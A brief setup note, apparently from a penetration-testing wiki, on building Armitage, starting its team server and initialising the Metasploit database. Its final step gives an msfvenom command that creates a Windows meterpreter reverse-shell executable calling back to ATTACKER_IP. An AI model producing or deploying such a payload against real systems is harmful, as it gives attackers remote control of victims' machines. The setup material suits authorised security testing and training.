Armitage

Setup

  • git clone https://gitlab.com/kalilinux/packages/armitage.git && cd armitage

  • bash package.sh

  • cd ./release/unix/ && ls -la

    • in this folder there are two files to use

    • teamserver

      • ip address of the server

      • shared password to access the server

    • armitage

      • used to connect to the teamserver

      • upon executing the banary, a prompt will open to enter connection details

Preparing the environment

  • before launching armitage, there is a few checks to ensure metasploit is configured properly

    • systemctl start postgresql && systemctl status postgresql

    • msfdb --use-defaults delete

    • msfdb --use-defaults init

Starting and connecting to armitage

  • cd /opt/armitage/release/unix && ./teamserver YourIP P@ssw0rd123

  • cd /opt/armitage/release/unix && ./armitage

Generating a shell to get a call back

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=31337 -f exe -o shell.exe

  • Lport is the port of the c2 listener

Last updated